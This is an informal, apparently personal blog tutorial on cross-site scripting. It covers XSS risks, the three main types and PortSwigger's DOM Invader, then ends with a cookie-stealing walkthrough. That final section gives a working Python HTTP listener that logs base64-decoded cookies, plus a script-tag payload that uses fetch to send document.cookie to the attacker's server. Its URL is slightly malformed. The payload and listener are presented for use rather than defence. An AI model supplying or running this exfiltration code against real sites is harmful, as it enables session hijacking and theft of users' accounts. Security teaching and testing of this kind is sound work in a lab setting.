So lets begin

What is Cross site scripting

if a website that directly renders user input it can be execute a html or js code that’s what we called xss or cross site scripting.

how it can be dangerous

1. Code Execution: One of the primary dangers of XSS is that it allows attackers to execute arbitrary code in the context of a user’s browser. This means the attacker can perform actions on behalf of the user, such as stealing sensitive information (like login credentials or session tokens), manipulating the appearance of the web page, or performing actions on the user’s behalf without their consent.
2. Session Hijacking: By stealing session cookies through XSS, an attacker can impersonate a legitimate user and gain unauthorized access to their accounts. This could lead to account compromise and unauthorized actions on the victim’s behalf.
3. Data Theft: XSS can be used to extract sensitive data from a user’s browser. For example, an attacker might craft a malicious script that sends user data (such as passwords or personal information) to a server under the attacker’s control.
4. Phishing Attacks: XSS can be employed to create realistic-looking phishing pages. When users unknowingly interact with these pages, their login credentials or other sensitive information can be captured by the attacker.
5. Drive-by Downloads: In some cases, XSS can be used to deliver malicious payloads, such as malware or other exploit code, to a user’s system. This can lead to further compromises beyond the scope of the web application.
6. Defacement: XSS can be used to deface websites, altering the appearance of the site to spread political or ideological messages, causing reputational damage to the affected organization.
7. SEO Poisoning: Attackers can use XSS to inject links or content that manipulates search engine rankings, redirecting users to malicious websites or spreading malware.

ok ima gonna explain about three types

Main Three types of xss

• Stored XSS (Persistent XSS): In this type, the malicious script is permanently stored on the target server, often in a database. When a user accesses a particular page or resource containing the injected script, it is retrieved and executed in their browser.
• Reflected XSS (Non-Persistent XSS): In this case, the malicious script is embedded in a URL or another input, and it is immediately reflected back to the user. The attack is typically carried out by tricking the user into clicking on a crafted link that contains the malicious payload.
• DOM-based XSS: This occurs when the DOM (Document Object Model) is manipulated by malicious scripts on the client side. The attack takes place within the Document Object Model, and the injected script is processed by the client’s browser.

DOM Invader

DOM Invader is tool that made by Portswigger.that can read dom data in web.so what is that doing for us😑

if it can find DOM data.it can finds dom based xss to

so let me give you a example

Hmm its like its search for text “Isuk4” in DOM

So i search it to check if DOM Invader can find that text in DOM.So it found it.yeeey😉

so when i click exploit.Booom💥💥

So like we talked about plenty of thing.mmm and I think we need to talk about Cookie with xss.

Cookie stealing with xsss

So i think you know that js can get cookie values.bro if you don’t know just type alert(document.cookie); in you’re browser console

Ok now you know so lets write script for it baby

from http.server import BaseHTTPRequestHandler, HTTPServer
import base64
from urllib.parse import urlparse, parse_qs

class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):

        parsed_url = urlparse(self.path)
        query_params = parse_qs(parsed_url.query)

        if 'data' in query_params:
            original_data = query_params['data'][0]

            try:
                data = base64.b64decode(original_data.encode('utf-8')).decode('utf-8')
                print("Received request:")
                print("cookie:", data)

                self.send_response(200)
                self.end_headers()
            except Exception as e:
                self.send_response(500)
                self.end_headers()
                self.wfile.write(f"Error processing request: {str(e)}".encode('utf-8'))
        else:
            self.send_response(400)
            self.end_headers()
            self.wfile.write("Missing 'data' parameter in the URL.".encode('utf-8'))

if __name__ == '__main__':
    server_address = ('', 8000)
    httpd = HTTPServer(server_address, RequestHandler)
    print('Server running on port 8000...')
    httpd.serve_forever()

mm run this code and exploit the xss by

<script>fetch(‘http:ip:8000/data=’+btoa(document.cookie));</script>

echo "GGS!Ima off";

GGS!Ima off